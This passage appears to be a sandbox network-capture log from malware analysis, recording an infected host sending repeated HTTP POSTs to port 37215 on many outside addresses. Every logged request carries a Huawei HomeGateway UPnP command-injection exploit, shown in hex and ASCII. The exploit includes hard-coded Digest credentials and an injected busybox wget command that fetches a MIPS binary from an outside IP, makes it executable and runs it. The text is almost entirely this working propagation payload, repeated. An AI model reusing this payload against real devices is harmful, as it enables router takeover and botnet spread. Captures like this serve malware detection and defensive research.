                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    322192.168.2.2349540197.225.16.11937215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.274063110 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    323192.168.2.2338926156.11.214.4937215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.274132013 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    324192.168.2.233541441.44.205.13537215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.274187088 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    325192.168.2.2355148156.122.9.24737215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.274230003 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    326192.168.2.2360032156.42.136.6337215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.274260044 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    327192.168.2.2336022156.19.157.1537215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.274295092 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    328192.168.2.2353616197.87.210.18637215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.274322033 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    329192.168.2.2346882197.249.199.2037215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.274355888 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    330192.168.2.234680641.87.219.22137215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.274389982 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    331192.168.2.2338934156.61.170.17437215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.274431944 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
